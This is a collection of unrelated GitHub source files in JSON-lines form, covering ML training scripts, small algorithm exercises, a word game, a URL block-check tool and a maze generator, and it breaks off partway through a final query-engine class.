+{"seq_id":"26878956407","text":"#!/usr/bin/env python3\n\nimport os\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, random_split\nimport pytorch_lightning as pl\nimport argparse\nimport yaml\nimport random\nimport numpy as np\nimport logging\nfrom waterfall import models\nfrom waterfall.utils import datapipe, datapipe_manual_ctc, datapipe_k2\nfrom waterfall.manual_ctc import eta_scheduler\nimport wandb\n\n\ndef main(args):\n cfg = yaml.load(open(args.config), Loader=yaml.loader.SafeLoader)\n pl.seed_everything(cfg['seed'], workers=True)\n\n batch_size = cfg['batch_size'] if args.batch_size == 0 else args.batch_size\n\n if cfg['loss'] == 'ctc':\n Dataset = datapipe.Dataset\n collate_fn = datapipe.collate_fn\n elif cfg['loss'] in ['ctc_fb', 'ctc_softmax']:\n Dataset = datapipe_manual_ctc.Dataset\n collate_fn = datapipe_manual_ctc.collate_fn\n elif cfg['loss'] in ['ctc_k2', 'k2']:\n Dataset = datapipe_k2.Dataset\n collate_fn = datapipe_k2.collate_fn_sorted\n\n if cfg['loss'] in ['ctc_k2', 'k2']:\n train_data = Dataset(args.train_set,\n args.lang_dir, token_type='phones')\n dev_data = Dataset(args.dev_set,\n args.lang_dir, token_type='phones')\n else:\n train_data = Dataset(args.train_set,\n args.lang_dir)\n dev_data = Dataset(args.dev_set,\n args.lang_dir)\n\n train_gen = DataLoader(train_data,\n batch_size=batch_size,\n shuffle=True,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n dev_gen = DataLoader(dev_data,\n batch_size=batch_size,\n shuffle=False,\n num_workers=cfg['num_workers'],\n persistent_workers=True,\n collate_fn=collate_fn)\n\n model = models.Wav2VecFineTuningDiverse(\n train_data.lang.num_nn_output, cfg=cfg, lang_dir=args.lang_dir)\n\n os.makedirs('exp/%s' % (args.name), exist_ok=True)\n model_checkpoint= pl.callbacks.ModelCheckpoint(monitor='valid_loss',\n save_top_k=1 if 'save_top_k' not in cfg.keys(\n ) else cfg['save_top_k'],\n every_n_epochs=1,\n filename='{epoch}-{valid_loss:.3f}',\n mode='min')\n callbacks = [model_checkpoint,\n pl.callbacks.LearningRateMonitor(logging_interval='step'),\n pl.callbacks.RichProgressBar(),\n pl.callbacks.RichModelSummary(max_depth=2)]\n\n if cfg['early_stopping']:\n callbacks.append(pl.callbacks.EarlyStopping(monitor='valid_loss',\n mode='min',\n patience=cfg['patience'],\n verbose=True))\n\n if 'auto_eta_scheduler' in cfg.keys() and cfg['auto_eta_scheduler']:\n callbacks.append(eta_scheduler.AutoEtaScheduler('valid_loss',\n delta_eta=cfg['delta_eta'],\n final_eta=cfg['final_eta'],\n patience=cfg['patience_eta'],\n verbose=True))\n\n accumulate_grad_batches = 1 # by default 1, args.accumulate_grad_batches has more priority than cfg['accumulate_grad_batches']\n if args.accumulate_grad_batches != 1:\n accumulate_grad_batches = args.accumulate_grad_batches\n elif 'accumulate_grad_batches' in cfg.keys():\n accumulate_grad_batches = cfg['accumulate_grad_batches']\n\n logger = pl.loggers.WandbLogger(\n project=args.name, save_dir='exp/%s' % (args.name))\n logger.watch(model, log='all')\n\n if args.checkpoint:\n if not args.load_weights_only:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n resume_from_checkpoint=args.checkpoint,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n model.load_state_dict(torch.load(args.checkpoint)['state_dict'])\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n else:\n trainer = pl.Trainer(gpus=args.gpus,\n strategy=cfg['strategy'],\n deterministic=False,\n max_epochs=cfg['max_epochs'],\n logger=logger,\n accumulate_grad_batches=accumulate_grad_batches,\n callbacks=callbacks)\n\n trainer.fit(model, train_gen, dev_gen)\n\n logger.log_metrics({'best_model_path': os.path.join(os.getcwd(), model_checkpoint.best_model_path),\n 'best_model_loss': model_checkpoint.best_model_score.item()})\n wandb.finish()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--train_set', help='Training set directory.', type=str)\n parser.add_argument('--dev_set', help='Dev set directory.', type=str)\n parser.add_argument('--lang_dir', help='Lang directory.', type=str)\n parser.add_argument('--config', help='Configuration file path.', type=str)\n parser.add_argument(\n '--name', help='Experiment name. Models will be stored in exp/$name/version*', type=str, default='ctc')\n parser.add_argument(\n '--gpus', help='Number of GPUs that used for training.', type=int, default=1)\n parser.add_argument(\n '--checkpoint', help='Resume from checkpoint.', type=str, default=None)\n parser.add_argument('--load_weights_only',\n help='Whether or not load weights only from checkpoint.', type=bool, default=False)\n parser.add_argument('--batch_size', help='The batch_size for training.', type=int, default=0)\n parser.add_argument(\n '--accumulate_grad_batches', help='The number of batches for gradient accumulation.', type=int, default=1)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"ZhaoZeyu1995/Waterfall","sub_path":"waterfall/bin/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"13416865029","text":"# Imports the Google Cloud client library\nfrom google.cloud import translate\n\n# Instantiates a client\ntranslate_client = translate.Client()\n\ndef translate (text,target):\n\n translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n return translation['translatedText']\n\n# The text to translate\n# text = u'です by Glamour'\n# The target language\n# target = 'pt'\n\n# Translates some text into Russian\n# translation = translate_client.translate(text, source_language = 'ja', target_language = target)\n\n#translate_client.get\n\n# print(u'Text: {}'.format(text))\n# print(u'Translation: {}'.format(translation['translatedText']))\n","repo_name":"rovanemoura/DESU-by-Glamour","sub_path":"translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38563579519","text":"# Kelime Tahmin Oyunu\n# Önce rastgele bir kelime seçilecek (Bu bir fonksiyon olsun. Bir listenin içinden rastgele bir kelime seçip versin)\n# Kaç haklı oynamak istediğini oyuncuya soracak. 1 ile 25 arasında bir sayı seçmesi sağlanacak. Buna HakSayısı diyelim.\n# Rastgele seçilen Kelimenin harf sayısı kadar ekrana ****** basılacak.\n# ve Oyuncuya \"Tahminini gir\" diyecek. Bir harf girmek dışındaki girişlerde \"hatalı giriş yaptın\" diyecek.\n# Girilen harf, kelienin içinde varsa onu görünür yapacak. \"Tebrikler bir harf bildin. Kelime = ****A** \" gibi bir mesaj vrecek\n# Harf hatalı ise hakSayısından düşecek. Hak sayısı sıfır olunca \"KAYBETTİN\" mesajıyla oyun bitecek.\n# Tahmin hakları bitmeden kelimeyi bilirse \"TEBRİKLER KAZANDIN\" mesajı ile oyun bitecek.\n# kulanılacak kütüphane random\n# mesela 1 ile 20 arasında rastgele bir sayı üretecek fonksiyon : randint(0,19)\n#\n# Her seferinde ekrana yıldızlı yazdırmak için ipucu :\n# Tahmin girildiğinde, eğer girilen harf kelimenin içinde varsa bu harfi bulunanlar adlı bir diziye atarız\n# kelimenin eleman sayısını len() ile buluruz.\n# Bir döngüde her bir harf için şunu yaparız; bu harf bulunanlar dizisinde varsa harfin kendisini yazarız, yoksa * yazarız.\n# En sonunda,\nimport random\n\n#rastgele bir kelime bulma fonksiyonu\ndef KelimeSec():\n kelimeler = ['masa','kalemkutu','makas','ev','koyun','armut','kiraz','dolap','balina', \"berat\"]\n sayı = random.randint(0,len(kelimeler)-1)\n secim = kelimeler[sayı].lower()\n return secim\n\n\n\n#tahmin edilecek kelimeyi yıldızlar halinde yazar. Bulunan harfleri yerlerine yerleştirir.\ndef EkranaYaz(kelime,liste):\n yazılacak = \"\"\n for harf in kelime:\n if (harf in liste):\n yazılacak = yazılacak + harf\n else:\n yazılacak = yazılacak + \"*\"\n\n print(\"KELİME = \"+yazılacak)\n\n return yazılacak\n\n#giriş ekranını gösteren fonksiyon\ndef GirisEkranı():\n print(\"-----KELİME TAHMİN OYUNUNA-----\"\"\\n\"\n \"-----------HOŞGELDİNİZ---------\"\"\\n\"\n \"-------------------------------\"\"\\n\")\n\n# burada, kullanıcı doğru bir seçim girene kadar soruluyor\ndef OyunHakSayısı():\n hak = 0\n while True:\n try:\n hak = int(input(\"Kaç haklı oynamak istersiniz.\"))\n except:\n print(\"Hatalı giriş yaptınız\")\n continue\n if (hak > 25 or hak < 0):\n print(\"HATALI SEÇİM (1 ile 25 arasında seçim yapın) \")\n continue\n else:\n break\n return hak\n\n\n\n# Programın ana bölümü\n\nGirisEkranı()\n\nkelime = KelimeSec()\n\nuzunluk = len(kelime)\n\nbulunan_harfler = []\n\noyunhakkı = OyunHakSayısı()\n\nprint(\"*\" * uzunluk)\n\nwhile True:\n\n harf = input(\"Harf tahmin edin\")\n harf = harf.lower()\n if(harf in kelime):\n if(harf not in bulunan_harfler):\n bulunan_harfler.append(harf)\n else:\n oyunhakkı = oyunhakkı - 1\n print(\"{} hakkınız kaldı. \".format(oyunhakkı))\n\n if (oyunhakkı == 0):\n print(\"Oyunu kaybettin\")\n quit()\n\n ekranaYazılan = EkranaYaz(kelime,bulunan_harfler)\n\n# eğer tüm harfler bulundu ise kazandın deyip oyunu bitirsin\n if(kelime == ekranaYazılan):\n print(\"Oyunu kazandınız TEBRİKLER\")\n quit()\n\n\n\n\n","repo_name":"hasanlacin/Berat-Projeler","sub_path":"Kelime Tahmin Oyunu.py","file_name":"Kelime Tahmin Oyunu.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"4216976168","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\ndef algorithm(number1, number2):\n m = number1\n n = number2\n start = True\n while(start):\n t = m // n\n r = m - n * t\n if r == 0:\n print(\"Наибольшим числителем для {} и {} есть {}\".format(number1, number2 , n))\n start = False\n else:\n m = n\n n = r\n\n","repo_name":"MaxAlekseevDev/Algorithms","sub_path":"Euclid_algorithm.py","file_name":"Euclid_algorithm.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"24237968283","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom enum import Enum, unique\nimport urllib.request\n\n\n@unique\nclass Category(Enum):\n Android = '5562b410e4b00c57d9b94a92' # 安卓\n Frontend = '5562b415e4b00c57d9b94ac8' # 前端\n IOS = '5562b405e4b00c57d9b94a41' # iOS\n Backend = '5562b419e4b00c57d9b94ae2' # 后端\n Design = '5562b41de4b00c57d9b94b0f' # 设计\n Product = '569cbe0460b23e90721dff38' # 产品\n Freebie = '5562b422e4b00c57d9b94b53' # 工具资源\n Article = '5562b428e4b00c57d9b94b9d' # 阅读\n AI = '57be7c18128fe1005fa902de' # 人工智能\n All = 'all'\n\n\nARTICLETYPE = {\n 'hot': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_rank',\n 'new': 'https://timeline-merger-ms.juejin.im/v1/get_entry_by_timeline',\n}\n\n\ndef get_juejin(limit=20, category=Category.All, article_type='hot', src='sixgold'):\n if article_type == 'hot':\n url = ARTICLETYPE['hot']\n else:\n url = ARTICLETYPE['new']\n\n req_url = '%s?src=%s&limit=%s&category=%s' % (url, src, limit, category.value)\n\n def make_request():\n with urllib.request.urlopen(req_url) as f:\n yield f.read()\n\n yield from make_request()\n\nif __name__ == '__main__':\n for i in get_juejin(limit=5, category=Category.AI, article_type='new', src='sixgold'):\n print(i.decode('utf-8'))\n print(\"\\n\")","repo_name":"kobelover/juejin","sub_path":"juejin.py","file_name":"juejin.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"42002494260","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Импорты Python\nimport time, sys, threading, signal, ipaddress, gc, configparser, sqlite3, os\n\n# Сторонние пакеты\nimport requests\n\n# Наш конфигурационный файл\nconfig = configparser.ConfigParser()\nconfig.read('/etc/roskom/tools.ini')\n\n# База данных\ndb = sqlite3.connect(config['roskomtools']['database'])\n\n# Создадим таблицы результатов проверок\ncursor = db.cursor()\ncursor.execute(\"CREATE TABLE IF NOT EXISTS checks (check_id INTEGER PRIMARY KEY AUTOINCREMENT, check_when INTEGER, check_total INTEGER, check_available INTEGER, check_minutes INTEGER, check_seconds INTEGER, check_maxrss INTEGER)\")\ncursor.execute(\"CREATE TABLE IF NOT EXISTS available_links (link_check_id INTEGER, link_when INTEGER, link_url TEXT)\")\ncursor.close()\ndb.commit()\n\n# Общи�� модули\nsys.path.append('/usr/share/roskomtools')\nimport rknparser\n\n# Время начала работы скрипта\nexecution_start = time.time()\n\n# Расставим затычки-мьютексы\nin_mutex = threading.Lock()\nout_mutex = threading.Lock()\n\n# Прикинемся браузером\nrequest_headers = {\n\t'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108 Safari/537.36',\n}\n\n# Текст для поиска в ответе\nsearch_text = config['check']['search_text'].encode('utf-8')\n\n# Счётчик обработанных ссылок (для отображения прогресса)\ncounter = 0\n\n# Наш воркер\nclass Worker(threading.Thread):\n\tdef __init__(self, thread_id, in_data, out_data, trace):\n\t\tthreading.Thread.__init__(self),\n\t\tself.thread_id = thread_id\n\t\tself.in_data = in_data\n\t\tself.out_data = out_data\n\t\tself.timeout = 3\n\t\tself.iter_count = 0\n\t\tself.total_count = len(in_data)\n\t\tself.trace = trace\n\n\tdef select_unprocessed(self):\n\t\twith in_mutex:\n\t\t\ttry:\n\t\t\t\tresult = self.in_data.pop()\n\t\t\texcept:\n\t\t\t\tresult = None\n\t\t\treturn result\n\n\tdef report_progress(self, item):\n\t\tglobal counter\n\t\tcounter += 1\n\t\tprint(u\"(%d of %d) [%s] %s\" % (counter, self.total_count, item['status'], item['url']))\n\n\tdef process_item(self, item):\n\t\tglobal request_headers, search_text\n\t\titem['checked'] = int(time.time())\n\n\t\ttry:\n\t\t\tresponse = requests.get(item['url'], timeout = self.timeout, stream = True, headers = request_headers)\n\t\t\tcontent = response.raw.read(10000, decode_content = True)\n\n\t\t\tif search_text in content:\n\t\t\t\titem['status'] = 'blocked'\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tpeer = response.raw._connection.sock.getpeername()\n\t\t\t\texcept:\n\t\t\t\t\titem['status'] = 'available'\n\t\t\t\telse:\n\t\t\t\t\tif peer is not None:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\taddress = ipaddress.ip_address(peer[0])\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\titem['status'] = 'available' # ???\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif address.is_private:\n\t\t\t\t\t\t\t\titem['status'] = 'local-ip'\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\titem['status'] = 'available'\n\t\t\t\t\telse:\n\t\t\t\t\t\titem['status'] = 'available'\n\t\texcept Exception as e:\n\t\t\titem['status'] = 'failure'\n\n\t\twith out_mutex:\n\t\t\tif self.trace:\n\t\t\t\tself.report_progress(item)\n\t\t\tself.out_data.append(item)\n\n\t\tself.iter_count += 1\n\t\tif (self.iter_count % 100) == 0:\n\t\t\tgc.collect()\n\n\tdef set_timeout(self, new_timeout):\n\t\tself.timeout = new_timeout\n\n\tdef run(self):\n\t\twhile True:\n\t\t\titem = self.select_unprocessed()\n\t\t\tif item is None:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself.process_item(item)\n\n# Профилирование\nimport resource\n\ndef signal_handler(signal, frame):\n\tprint(\"Aborted by signal, exitting.\")\n\texit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\nsignal.signal(signal.SIGTERM, signal_handler)\nsignal.signal(signal.SIGQUIT, signal_handler)\n\nprint(\"Starting using %d threads\" % (int(config['check']['threads']),))\n\ntry:\n\tprint(\"Loading data...\")\n\tin_data = rknparser.load_urls(db)\n\tout_data = []\nexcept:\n\tprint(\"Failed to load data. Run rkn-load.py to load the registry and rkn-parse.py to parse it.\")\n\texit(-1)\n\nprint(\"Loading succeeded, starting check\")\n\n# Инициализируем наши рабочие потоки\nthreads = {}\nfor i in range(int(config['check']['threads'])):\n\tthreads[i] = Worker(i, in_data, out_data, True)\n\tthreads[i].set_timeout(int(config['check']['http_timeout']))\n\tthreads[i].setDaemon(True)\n\n# Разветвляемся\nfor index, thread in threads.items():\n\tthread.start()\n\n# Соединяемся\nfor index, thread in threads.items():\n\tthread.join()\n\n# На этом этапе у нас сформирована статистика в массиве out_data, получим данные для внесения в БД\ntimestamp = int(time.time())\ntotal_count = len(out_data)\navailable = [i for i in out_data if i['status'] == 'available']\n#unavailable = [i for i in out_data if i['status'] in ['blocked', 'failure', 'local-ip']]\navailable_count = len(available)\n\n# Предварительная оценка ресурсов для записи в лог\nstat = resource.getrusage(resource.RUSAGE_SELF)\n\n# Время окончания работы скрипта\nexecution_end = time.time()\nexecution_time = execution_end - execution_start\nexecution_minutes = int(execution_time / 60)\nexecution_seconds = (execution_time - (execution_minutes * 60))\n\n# Сохраним результат в БД\ncursor = db.cursor()\ndata = (timestamp, total_count, available_count, execution_minutes, execution_seconds, stat.ru_maxrss)\ncursor.execute(\"INSERT INTO checks (check_when, check_total, check_available, check_minutes, check_seconds, check_maxrss) VALUES (?, ?, ?, ?, ?, ?)\", data)\ncheck_id = cursor.lastrowid\nfor link in available:\n\tdata = (check_id, link['checked'], link['url'])\n\tcursor.execute(\"INSERT INTO available_links (link_check_id, link_when, link_url) VALUES (?, ?, ?)\", data)\ncursor.close()\ndb.commit()\n\nif os.isatty(sys.stdin.fileno()):\n\twith open('result.txt', 'w') as f:\n\t\tfor link in available:\n\t\t\tf.write(\"%s <%d>\\n\" % (link['url'], link['checked']))\n\n\tprint(\"---\\nCheck finished in %dm:%.2fs using %d kb RES\\nAvailable: %d, not available: %d\" % (execution_minutes, execution_seconds, stat.ru_maxrss, available_count, total_count - available_count))\n","repo_name":"orgtechservice/roskomtools","sub_path":"rkn-check/usr/bin/rkn-check.py","file_name":"rkn-check.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"}
+{"seq_id":"33333794403","text":"\"\"\"\n问题描述:给定一个double类型的数组arr,其中的元素可正、可负、可0,返回子数组累乘的最大\n乘积。\n\n例如:\narr=[-2.5,4,0,3,0.5,8,-1],子数组[3,0.5,8]累乘可以获得最大的乘积12,所以返回12.\n\"\"\"\n\n\nclass SubArrMaxSum:\n @classmethod\n def get_max_sum(cls, arr):\n if not arr:\n return\n\n if len(arr) == 1:\n return arr[0]\n\n pre_max = arr[0]\n pre_min = arr[0]\n res = arr[0]\n\n for i in range(1, len(arr)):\n end_max = pre_max * arr[i]\n end_min = pre_min * arr[i]\n\n pre_max = max([arr[i], end_max, end_min])\n pre_min = min([arr[i], end_max, end_min])\n\n res = max([res, pre_max])\n\n return res\n\n\nif __name__ == '__main__':\n my_arr = [-2.5, 4, 0, 3, 0.5, 8, -1]\n print(SubArrMaxSum.get_max_sum(my_arr))\n","repo_name":"ResolveWang/algorithm_qa","sub_path":"arrandmatrix/q19.py","file_name":"q19.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"zh","doc_type":"code","stars":86,"dataset":"github-code","pt":"19"}
+{"seq_id":"43465308279","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 14:57:48 2019\r\n\r\n@author: Yahir F. Rivas\r\n\"\"\"\r\n\r\n# Starting point for program to build and draw a maze\r\n# Modify program using disjoint set forest to ensure there is exactly one\r\n# simple path joiniung any two cells\r\n# Programmed by Olac Fuentes\r\n# Last modified March 28, 2019\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\nimport time\r\n\r\ndef draw_maze(walls,maze_rows,maze_cols,cell_nums=False):\r\n fig, ax = plt.subplots()\r\n for w in walls:\r\n if w[1]-w[0] ==1: #vertical wall\r\n x0 = (w[1]%maze_cols)\r\n x1 = x0\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0+1\r\n else:#horizontal wall\r\n x0 = (w[0]%maze_cols)\r\n x1 = x0+1\r\n y0 = (w[1]//maze_cols)\r\n y1 = y0 \r\n ax.plot([x0,x1],[y0,y1],linewidth=1,color='k')\r\n sx = maze_cols\r\n sy = maze_rows\r\n ax.plot([0,0,sx,sx,0],[0,sy,sy,0,0],linewidth=2,color='k')\r\n if cell_nums:\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols \r\n ax.text((c+.5),(r+.5), str(cell), size=10,\r\n ha=\"center\", va=\"center\")\r\n ax.axis('off') \r\n ax.set_aspect(1.0)\r\n\r\ndef wall_list(maze_rows, maze_cols):\r\n # Creates a list with all the walls in the maze\r\n w =[]\r\n for r in range(maze_rows):\r\n for c in range(maze_cols):\r\n cell = c + r*maze_cols\r\n if c!=maze_cols-1:\r\n w.append([cell,cell+1])\r\n if r!=maze_rows-1:\r\n w.append([cell,cell+maze_cols])\r\n return w\r\n\r\ndef find(S,i):\r\n # Returns root of tree that i belongs to\r\n if S[i]<0:\r\n return i\r\n return find(S,S[i])\r\n\r\ndef find_c(S,i): #Find with path compression \r\n if S[i]<0: \r\n return i\r\n r = find_c(S,S[i]) \r\n S[i] = r \r\n return r\r\n\r\nplt.close(\"all\") \r\nmaze_rows = 10\r\nmaze_cols = 15\r\n\r\n\r\ndef DisjointSetForest(size):\r\n return np.zeros(size,dtype=np.int)-1 \r\n\r\ndef numSets(S): #return the number of sets\r\n count = 0\r\n for i in S:\r\n if i < 0: #if it is -1 then it is a root so add 1\r\n count += 1\r\n return count\r\n\r\ndef union(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n ri = find(S,i) \r\n rj = find(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\ndef union_c(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj:\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nplt.close(\"all\")\r\n\r\ndef countSets(S):\r\n\tc = 0\r\n\tfor i in S:\r\n\t\tif i==-1:\r\n\t\t\tc+=1\r\n\treturn c \r\n\r\ndef unionSize(S,i,j):\r\n # Joins i's tree and j's tree, if they are different\r\n # Uses path compression\r\n ri = find_c(S,i) \r\n rj = find_c(S,j)\r\n if ri!=rj: #if different root\r\n if S[ri] > S[rj]: #if ri is bigger than rj then rj goes to ri\r\n S[rj] += S[ri]\r\n S[ri] = rj\r\n return True\r\n else:\r\n S[ri] += S[rj] #if rj is bigger than ri then ri goes to rj\r\n S[rj] = ri\r\n return True\r\n return False\r\n\r\nmaze_rows = 10\r\nmaze_cols = 15 \r\nwalls = wall_list(maze_rows,maze_cols)\r\n\r\ndraw_maze(walls,maze_rows,maze_cols,cell_nums=True) \r\n\r\nS = DisjointSetForest(maze_rows*maze_cols)#use a dsf to create maze\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1: \r\n d = random.randint(0,len(walls)-1)\r\n if union(S,walls[d][0],walls[d][1]): #if they are in different sets\r\n walls.pop(d) #remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for standard union is: \", rt ) \r\n\r\n'''\r\nstart = time.time()\r\nwhile countSets(S) > 1:\r\n d = random.randint(0,len(walls)-1)\r\n if union_c(S,walls[d][0],walls[d][1]):#if they are in different sets\r\n walls.pop(d)#remove wall\r\nend = time.time() \r\nrt = end - start\r\nprint(\"The running time for compression is: \", rt ) \r\n \r\n \r\n'''\r\nfor i in range(len(walls)//2): #Remove 1/2 of the walls \r\n d = random.randint(0,len(walls)-1)\r\n print('removing wall ',walls[d])\r\n walls.pop(d)\r\n'''\r\nplt.close(\"all\")\r\n\r\ndraw_maze(walls,maze_rows,maze_cols) \r\n","repo_name":"yfrivas/CS2302","sub_path":"Lab6.py","file_name":"Lab6.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3418914962","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nimport openood.utils.comm as comm\nfrom openood.losses import soft_cross_entropy\nfrom openood.utils import Config\n\nfrom .lr_scheduler import cosine_annealing\n\n\ndef prepare_mixup(batch, alpha=1.0, use_cuda=True):\n \"\"\"Returns mixed inputs, pairs of targets, and lambda.\"\"\"\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n batch_size = batch['data'].size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n return index, lam\n\n\ndef mixing(data, index, lam):\n return lam * data + (1 - lam) * data[index]\n\n\nclass MixupTrainer:\n def __init__(self, net: nn.Module, train_loader: DataLoader,\n config: Config) -> None:\n\n self.net = net\n self.train_loader = train_loader\n self.config = config\n self.alpha = self.config.trainer.trainer_args.alpha\n\n self.optimizer = torch.optim.SGD(\n net.parameters(),\n config.optimizer.lr,\n momentum=config.optimizer.momentum,\n weight_decay=config.optimizer.weight_decay,\n nesterov=True,\n )\n\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(\n self.optimizer,\n lr_lambda=lambda step: cosine_annealing(\n step,\n config.optimizer.num_epochs * len(train_loader),\n 1,\n 1e-6 / config.optimizer.lr,\n ),\n )\n\n def train_epoch(self, epoch_idx):\n self.net.train()\n\n loss_avg = 0.0\n train_dataiter = iter(self.train_loader)\n\n for train_step in tqdm(range(1,\n len(train_dataiter) + 1),\n desc='Epoch {:03d}: '.format(epoch_idx),\n position=0,\n leave=True,\n disable=not comm.is_main_process()):\n batch = next(train_dataiter)\n\n # mixup operation\n index, lam = prepare_mixup(batch, self.alpha)\n data_mix = mixing(batch['data'].cuda(), index, lam)\n soft_label_mix = mixing(batch['soft_label'].cuda(), index, lam)\n\n # forward\n logits_classifier = self.net(data_mix)\n loss = soft_cross_entropy(logits_classifier, soft_label_mix)\n\n # backward\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n\n # exponential moving average, show smooth values\n with torch.no_grad():\n loss_avg = loss_avg * 0.8 + float(loss) * 0.2\n\n metrics = {}\n metrics['epoch_idx'] = epoch_idx\n metrics['loss'] = loss_avg\n\n return self.net, metrics\n","repo_name":"Jingkang50/OpenOOD","sub_path":"openood/trainers/mixup_trainer.py","file_name":"mixup_trainer.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"19"}
+{"seq_id":"16624151939","text":"\"\"\"\nCreate a function that returns the sum of the two lowest positive numbers given an array of minimum 4 integers. No floats or empty arrays will be passed.\n\nFor example, when an array is passed like [19, 5, 42, 2, 77], the output should be 7.\n\n[10, 343445353, 3453445, 3453545353453] should return 3453455.\n\nHint: Do not modify the original array.\n\"\"\"\n\nclass Solution():\n def sum_two_smallest_numbers(self, numbers):\n numbers.sort()\n _len = len(numbers)\n i = 0\n while i < _len and numbers[i] < 1:\n i += 1\n\n if i < _len - 1:\n return numbers[i] + numbers[i + 1]\n\ndef main():\n print(Solution().sum_two_smallest_numbers([19, 5, 42, 2, 77])) # 7\n print(Solution().sum_two_smallest_numbers([-19, 5, 42, 2, 77])) # 7\n\n\nif __name__ == '__main__':\n main()","repo_name":"dbconfession78/interview_prep","sub_path":"code_wars/0001_sum_of_two_smallest_positive_integers.py","file_name":"0001_sum_of_two_smallest_positive_integers.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"30777901591","text":"\ntcases = int(input())\n\nfor x in range(tcases):\n #x starts fro 0 till tcases-1\n N = int(input())\n S = input() #len N --- SOlutions\n U = input() #len N 'N' if not answered the q, otherwise ans\n\n score = 0\n i=0\n while i<= N-1:\n if U[i] == 'N': #not answered see next one\n i+=1\n continue\n elif U[i] == S[i]: #correct answer\n score +=1\n i+=1\n continue\n elif U[i] != S[i]: #incorrect, skip next question\n i+=2\n\n print(score)\n\n\n","repo_name":"SankalppPanghal/Python","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30492702489","text":"from __future__ import annotations\n\nimport copy\nimport json\n\nfrom cachetools import TTLCache\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nfrom argrelay.enum_desc.ReservedArgType import ReservedArgType\nfrom argrelay.misc_helper.ElapsedTime import ElapsedTime\nfrom argrelay.relay_server.QueryCacheConfig import QueryCacheConfig\nfrom argrelay.relay_server.QueryResult import QueryResult\nfrom argrelay.runtime_context.SearchControl import SearchControl\nfrom argrelay.runtime_data.AssignedValue import AssignedValue\nfrom argrelay.schema_config_core_server.StaticDataSchema import data_envelopes_\n\n\nclass QueryEngine:\n\n def __init__(\n self,\n query_cache_config: QueryCacheConfig,\n mongo_db: Database,\n ):\n self.mongo_db: Database = mongo_db\n self.mongo_col: Collection = self.mongo_db[data_envelopes_]\n self.query_cache: 